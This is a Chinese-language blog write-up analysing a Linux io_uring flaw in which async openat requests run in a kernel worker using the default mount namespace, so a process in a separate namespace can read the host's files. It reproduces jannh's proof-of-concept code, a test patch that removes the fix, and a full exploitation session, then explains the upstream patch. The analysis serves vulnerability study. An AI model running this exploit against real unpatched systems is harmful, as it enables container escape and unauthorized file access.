Linux “io_uring” namespace 的一个问题

Linux

 

看了jannh的report, 有点迷迷糊糊的,于是跟着分析了一波。之前也分析过 io_uring 一个权限问题,io_uring代码还在频繁的更新,期间肯定会出现各种各样的安全问题,要找个时间研究一波hh.

 

环境配置

以下所有的分析都是在 ubuntu 18.04 虚拟机下,使用的是linux-5.6 版本的内核,可以在github上找到我的环境

 

漏洞分析

这个洞其实就是没有做好namespace的检查,最后导致可以读取其他namespace的文件,这放到容器里那就是逃逸了。这里从代码的层面看看究竟发生了什么。

poc

可以在这里 找到jannh 的poc,

int main(void) {
// initialize uring
struct io_uring_params params = { };
int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));
// execute openat via uring
sqes[0] = (struct io_uring_sqe) {
.opcode = IORING_OP_OPENAT,
.flags = IOSQE_ASYNC,
.fd = open("/", O_RDONLY),
.addr = (unsigned long)"/",
.open_flags = O_PATH | O_DIRECTORY
};
((int*)(sq_ring + params.sq_off.array))[0] = 0;
(*(int*)(sq_ring + params.sq_off.tail))++;
int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));

主要看传入的 sqes 部分, 传入的opcode是IORING_OP_OPENATIOSQE_ASYNC 表示用异步的方式,打开的是"/" 目录

因为这里使用的内核是已经打上了补丁了,为了测试漏洞,我们需要手动patch一下,找到fs/io_uring.c 文件, 按照下面把对 fs的检查注释掉。

static inline void io_req_work_grab_env(struct io_kiocb *req,    
const struct io_op_def *def)                 
{                                                                
if (!req->work.mm && def->needs_mm) {                        
mmgrab(current->mm);                                     
req->work.mm = current->mm;                              
}                                                            
if (!req->work.creds)                                        
req->work.creds = get_current_cred();                    
/*if (!req->work.fs && def->needs_fs) {*/                    
/*spin_lock(&current->fs->lock);*/                       
/*if (!current->fs->in_exec) {*/                         
/*req->work.fs = current->fs;*/                      
/*req->work.fs->users++;*/                           
/*} else {*/                                             
/*req->work.flags |= IO_WQ_WORK_CANCEL;*/            
/*}*/                                                    
/*spin_unlock(&current->fs->lock);*/                     
/*}*/                                                        
if (!req->work.task_pid)                                     
req->work.task_pid = task_pid_vnr(current);              
}                                                                
static inline void io_req_work_drop_env(struct io_kiocb *req)     
{                                                                 
if (req->work.mm) {                                           
mmdrop(req->work.mm);                                     
req->work.mm = NULL;                                      
}                                                             
if (req->work.creds) {                                        
put_cred(req->work.creds);                                
req->work.creds = NULL;                                   
}                                                             
/*if (req->work.fs) {*/                                       
/*struct fs_struct *fs = req->work.fs;*/                  
/*spin_lock(&req->work.fs->lock);*/                       
/*if (--fs->users)*/                                      
/*fs = NULL;*/                                        
/*spin_unlock(&req->work.fs->lock);*/                     
/*if (fs)*/                                               
/*free_fs_struct(fs);*/                               
/*}*/                                                         
}

代码分析

SYS_io_uring_enter 之后的调用链如下

__do_sys_io_uring_enter
- io_submit_sqes
- io_submit_sqe
- io_queue_sqe
- io_req_defer_prep //<--
- io_req_work_grab_env

io_req_defer_prep 函对传入的各种opcode做switch, 我们传入的是IORING_OP_OPENAT, 对应调用io_openat_prep

      break;                                       
case IORING_OP_LINK_TIMEOUT:                     
ret = io_timeout_prep(req, sqe, true);       
break;                                       
case IORING_OP_ACCEPT:                           
ret = io_accept_prep(req, sqe);              
break;                                       
case IORING_OP_FALLOCATE:                        
ret = io_fallocate_prep(req, sqe);           
break;                                       
case IORING_OP_OPENAT:    // <-------------------------------                       
ret = io_openat_prep(req, sqe);              
break;                                       
case IORING_OP_CLOSE:                            
ret = io_close_prep(req, sqe);               
break;                                       
case IORING_OP_FILES_UPDATE:                     
ret = io_files_update_prep(req, sqe);

io_openat_prep 主要是把sqes 的东西拿出来保存好, io_req_defer_prep 执行完之后会调用io_queue_async_work(req)

static int io_openat_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)     
{                                                                                   
const char __user *fname;                                                       
int ret;                                                                        
if (sqe->ioprio || sqe->buf_index)                                              
return -EINVAL;                                                             
if (sqe->flags & IOSQE_FIXED_FILE)                                              
return -EBADF;                                                              
if (req->flags & REQ_F_NEED_CLEANUP)                                            
return 0;                                                                   
req->open.dfd = READ_ONCE(sqe->fd);                                             
req->open.how.mode = READ_ONCE(sqe->len);                                       
fname = u64_to_user_ptr(READ_ONCE(sqe->addr));                                  
req->open.how.flags = READ_ONCE(sqe->open_flags);                               
req->open.filename = getname(fname);                                            
if (IS_ERR(req->open.filename)) {                                               
ret = PTR_ERR(req->open.filename);                                          
req->open.filename = NULL;                                                  
return ret;                                                                 
}                                                                               
req->open.nofile = rlimit(RLIMIT_NOFILE);                                       
req->flags |= REQ_F_NEED_CLEANUP;                                               
return 0;                                                                       
}

io_queue_async_work 把req->work 加入到 work queue, 之后会启动一个内核线程来执行这个work

static inline void io_queue_async_work(struct io_kiocb *req)          
{                                                                     
struct io_ring_ctx *ctx = req->ctx;                               
struct io_kiocb *link;                                            
bool do_hashed;                                                   
do_hashed = io_prep_async_work(req, &link);                       
trace_io_uring_queue_async_work(ctx, do_hashed, req, &req->work,  
req->flags);                                      
if (!do_hashed) {                                                 
io_wq_enqueue(ctx->io_wq, &req->work);                        
} else {                                                          
io_wq_enqueue_hashed(ctx->io_wq, &req->work,                  
file_inode(req->file));                           
}                                                                 
if (link)                                                         
io_queue_linked_timeout(link);                                
}

实际调试看看,在fs/io_uring.c:912 处下个断点

gef➤  info args
req = 0xffff88800d042c00
sqe = 0xffff88800d0c8000
gef➤  p *req
$1 = {
{
file = 0xffff88800eec4800,
//....
open = {
file = 0xffff88800eec4800,
dfd = 0x0,
{
mask = 0x0
},
filename = 0x0 <fixed_percpu_data>,
buffer = 0x0 <fixed_percpu_data>,
how = {
flags = 0x0,
mode = 0x0,
resolve = 0x0
},
nofile = 0x0
},
//..
work = {
{
list = {
next = 0x0 <fixed_percpu_data>
},
data = 0x0 <fixed_percpu_data>
},
func = 0xffffffff81354760 <io_wq_submit_work>,// <===
files = 0xffff88800ed90580,
mm = 0x0 <fixed_percpu_data>,
creds = 0x0 <fixed_percpu_data>,
fs = 0x0 <fixed_percpu_data>,
flags = 0x0,
task_pid = 0x0
}
}

在work字段里对应的是io_wq_submit_work 函数,进入到这个函数,已经是内核线程了,我们可以下个断点看看

gef➤  bt
#0  io_wq_submit_work (workptr=0xffffc90000277e88) at fs/io_uring.c:4522
#1  0xffffffff81356bba in io_worker_handle_work (worker=0xffff88800e08df00) at fs/io-wq.c:511
#2  0xffffffff81357679 in io_wqe_worker (data=0xffff88800e08df00) at fs/io-wq.c:552
#3  0xffffffff810c0fe1 in kthread (_create=0xffff88800d066b00) at kernel/kthread.c:255
#4  0xffffffff81c00215 in ret_from_fork () at arch/x86/entry/entry_64.S:352
#5  0x0000000000000000 in ?? ()
gef➤  kcurrent
smp system (__per_cpu_offset) 0xffffffff8245c920
cpu_num 0x1
swapper_pgd 0x0
cpu #0 : 0xffff88800f200000
current_task: 0xffff88800eee1600  :io_wqe_worker-0
uid: 0x0   gid: 0x0  :cred 0xffff88800eec2540
mm: 0x0
pgd: 0x0

最后会进入io_issue_sqe函数,然后根据传进来的opcode做switch, 在内核线程里调用io_openat

    case IORING_OP_OPENAT:                           
if (sqe) {                                   
ret = io_openat_prep(req, sqe);          
if (ret)                                 
break;                               
}                                            
ret = io_openat(req, nxt, force_nonblock);

接着调用do_filp_open 来打开文件返回文件描述符。貌似没有什么问题呀,正常的调用openat, 正常的打开文件或文件夹。

这是应用场景的不同,这里出现漏洞的原因是它没有对不同的namespace做区分,namespace是linux对系统资源的一种隔离机制,我们熟悉的docker就有用到namespace的东西,namespace相关的东西可以参考这篇文章,写的真棒,这里不做过多的描述。

利用测试

完整的利用流程如下

/home/pwn # echo aaaa > /tmp/real
/home/pwn # echo $$
206
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:55 mnt -> mnt:[4026531840]
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)-+-grep(212)
/home/pwn # unshare -m --uts /bin/sh
/bin/sh: can't access tty; job control turned off
/home/pwn # echo $$
213
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)---sh(213)-+-grep(215)
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:56 mnt -> mnt:[4026532131]
/home/pwn # mount -t tmpfs none /tmp
/home/pwn # ls /tmp
/home/pwn # /exp
submitted 1, getevents done
cq_tail = 1
result: 5
launching shell
sh: can't access tty; job control turned off
/home/pwn # echo $$
223
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)---sh(213)---exp(220)---sh(223)-+-grep(225)
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:57 mnt -> mnt:[4026532131]
/home/pwn # ls -al /proc/$$/fd/
total 0
dr-x------    2 root     0                0 Apr 15 02:58 .
dr-xr-xr-x    9 root     0                0 Apr 15 02:57 ..
lrwx------    1 root     0               64 Apr 15 02:58 0 -> /dev/console
lrwx------    1 root     0               64 Apr 15 02:58 1 -> /dev/console
lrwx------    1 root     0               64 Apr 15 02:58 2 -> /dev/console
lr-x------    1 root     0               64 Apr 15 02:58 4 -> /
l---------    1 root     0               64 Apr 15 02:58 5 -> /
/home/pwn # cat /proc/$$/fd/5/tmp/real
aaaa
/home/pwn # C#

首先创建一个 /tmp/real 文件,写入aaaa, 看一下当前shell的 mount namespace, 记住他的id为4026531840,

/home/pwn # echo aaaa > /tmp/real
/home/pwn # echo $$
206
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:55 mnt -> mnt:[4026531840]
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)-+-grep(212)

接着用 unshare 创建一个新的 mount namespace, 然后mount 上 tmpfs, 可以看到namespace的 id是4026532131,和原来的不同, 这个时候就看不到原来namespace的目录下的东西了(想一下docker的隔离),

/home/pwn # unshare -m --uts /bin/sh
/bin/sh: can't access tty; job control turned off
/home/pwn # echo $$
213
/home/pwn # pstree -p |grep sh
init(1)---rcS(171)---sh(206)---sh(213)-+-grep(215)
/home/pwn # ls -al /proc/$$/ns |grep mnt
lrwxrwxrwx    1 root     0                0 Apr 15 02:56 mnt -> mnt:[4026532131]
/home/pwn # mount -t tmpfs none /tmp
/home/pwn # ls /tmp

接着运行 exp, 它会打开/ 目录,返回的fd是 5

/home/pwn # /exp
submitted 1, getevents done
cq_tail = 1
result: 5
launching shell
sh: can't access tty; job control turned off
/home/pwn # echo $$
223
/home/pwn # ls -al /proc/$$/fd/
total 0
dr-x------    2 root     0                0 Apr 15 02:58 .
dr-xr-xr-x    9 root     0                0 Apr 15 02:57 ..
lrwx------    1 root     0               64 Apr 15 02:58 0 -> /dev/console
lrwx------    1 root     0               64 Apr 15 02:58 1 -> /dev/console
lrwx------    1 root     0               64 Apr 15 02:58 2 -> /dev/console
lr-x------    1 root     0               64 Apr 15 02:58 4 -> /
l---------    1 root     0               64 Apr 15 02:58 5 -> /
/home/pwn # cat /proc/$$/fd/5/tmp/real
aaaa

进去看一下可以发现这里打开的是原来namespace的"/" 目录。

linux 默认情况下所有的进程都会有一个系统默认的namespace, 也就是说本身linux就是一个最初的容器,我们新的namespace只是在最初的容器下创建一个新容器罢了。

从前面的分析我们知道,最后由于是异步的调用,会在内核线程io_wqe_worker-0 里调用 do_filp_open 来打开目录, 所有的内核线程都继承自kthreadd` 线程,使用的是默认的mount namespace

gef➤  kcurrent                                           
smp system (__per_cpu_offset) 0xffffffff8245c920         
cpu_num 0x1                                              
swapper_pgd 0x0                                          
cpu #0 : 0xffff88800f200000                              
current_task: 0xffff88800d080000  :io_wqe_worker-0   
uid: 0x0   gid: 0x0  :cred 0xffff88800eec2840    
mm: 0x0                                          
pgd: 0x0                                         
gef➤  kproc                                                     
0x1  :init            :  uid: 0  task: 0xffff88800ed88000
0x2  :kthreadd        :  uid: 0  task: 0xffff88800ed89600
0x3  :rcu_gp          :  uid: 0  task: 0xffff88800ed8ac00
//...
0xcf :sh              :  uid: 0  task: 0xffff88800d085800
0xd2 :exp             :  uid: 0  task: 0xffff88800d084200//
0xd3 :io_wq_manager   :  uid: 0  task: 0xffff88800d081600
0xd4 :io_wqe_worker-0 :  uid: 0  task: 0xffff88800d080000//

我们看一下他们的namespace

gef➤  p *((struct task_struct *)0xffff88800d084200)->nsproxy // exp  进程
$1 = {
count = {
counter = 0x2
},
uts_ns = 0xffffffff82613620 <init_uts_ns>,
ipc_ns = 0xffffffff8273c7c0 <init_ipc_ns>,
mnt_ns = 0xffff88800d6ece80,
pid_ns_for_children = 0xffffffff8265f7e0 <init_pid_ns>,
net_ns = 0xffffffff827f5ec0 <init_net>,
time_ns = 0xffffffff826bc940 <init_time_ns>,
time_ns_for_children = 0xffffffff826bc940 <init_time_ns>,
cgroup_ns = 0xffffffff826c1780 <init_cgroup_ns>
}
gef➤  p *((struct task_struct *)0xffff88800ed89600)->nsproxy//kthreadd
$3 = {
count = {
counter = 0x35
},
uts_ns = 0xffffffff82613620 <init_uts_ns>,
ipc_ns = 0xffffffff8273c7c0 <init_ipc_ns>,
mnt_ns = 0xffff88800ec65680,
pid_ns_for_children = 0xffffffff8265f7e0 <init_pid_ns>,
net_ns = 0xffffffff827f5ec0 <init_net>,
time_ns = 0xffffffff826bc940 <init_time_ns>,
time_ns_for_children = 0xffffffff826bc940 <init_time_ns>,
cgroup_ns = 0xffffffff826c1780 <init_cgroup_ns>
}
gef➤  p *((struct task_struct *)0xffff88800d080000)->nsproxy//io_wqe_worker-0
$2 = {
count = {
counter = 0x35
},
uts_ns = 0xffffffff82613620 <init_uts_ns>,
ipc_ns = 0xffffffff8273c7c0 <init_ipc_ns>,
mnt_ns = 0xffff88800ec65680,
pid_ns_for_children = 0xffffffff8265f7e0 <init_pid_ns>,
net_ns = 0xffffffff827f5ec0 <init_net>,
time_ns = 0xffffffff826bc940 <init_time_ns>,
time_ns_for_children = 0xffffffff826bc940 <init_time_ns>,
cgroup_ns = 0xffffffff826c1780 <init_cgroup_ns>
}
gef➤

可以看到,io_wqe_worker-0 的mnt_ns 地址是0xffff88800ec65680 ,和默认值一样,因为exp是运行在新的namespace下,它的mnt_ns=0xffff88800d6ece80,整理一下

  • 1 exp 运行(mnt_ns=0xffff88800d6ece80)
  • 2 io_uring 启动内核线程 openat, 内核线程io_wqe_worker-0 使用默认的mnt_ns

于是io_wqe_worker-0 看到的是一开始的mount namespace, 打开的也是原来namespace的"/" 目录,于是我们就可以通过这个fd来任意读里面的内容啦。

补丁

给出的补丁 如下, 添加了fs 字段,然后 启动内核线程前把 exp 的 fs 保存到 req->work.fs 里面

@@ -907,6 +915,16 @@ static inline void io_req_work_grab_env(struct io_kiocb *req,
}
if (!req->work.creds)
req->work.creds = get_current_cred();
+    if (!req->work.fs && def->needs_fs) {
+        spin_lock(&current->fs->lock);
+        if (!current->fs->in_exec) {
+            req->work.fs = current->fs;
+            req->work.fs->users++;
+        } else {
+            req->work.flags |= IO_WQ_WORK_CANCEL;
+        }
+        spin_unlock(&current->fs->lock);
+    }
}
static inline void io_req_work_drop_env(struct io_kiocb *req)
@@ -919,6 +937,16 @@ static inline void io_req_work_drop_env(struct io_kiocb *req)
put_cred(req->work.creds);
req->work.creds = NULL;
}
+    if (req->work.fs) {
+        struct fs_struct *fs = req->work.fs;
+
+        spin_lock(&req->work.fs->lock);
+        if (--fs->users)
+            fs = NULL;
+        spin_unlock(&req->work.fs->lock);
+        if (fs)
+            free_fs_struct(fs);
+    }
}

然后再在内核线程里面检查一致性。

if (work->fs && current->fs != work->fs)     
current->fs = work->fs;

 

小结

总的来说这里和之前cve-2019-19241,差不多,都是因为在内核线程里面没有做好检查,然后可以做一些不可描述的事情,漏洞本身其实也不能说是漏洞,就是忘了检查…通过这个issue学习了一波namespace和cgroup的东西,满足:P.

 

reference

https://bugs.chromium.org/p/project-zero/issues/detail?id=2011

https://lore.kernel.org/io-uring/20200207155039.12819-1-axboe@kernel.dk/T/

https://lore.kernel.org/io-uring/20200207155039.12819-1-axboe@kernel.dk/T/

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ff002b30181d30cdfbca316dadd099c3ca0d739c

https://segmentfault.com/a/1190000009732550

本文由安全客原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/203112

本文来源于Lonely Blog -全球网络安全资讯平台, 转载请注明出处: https://blog.wuhao13.xin/140.html

标签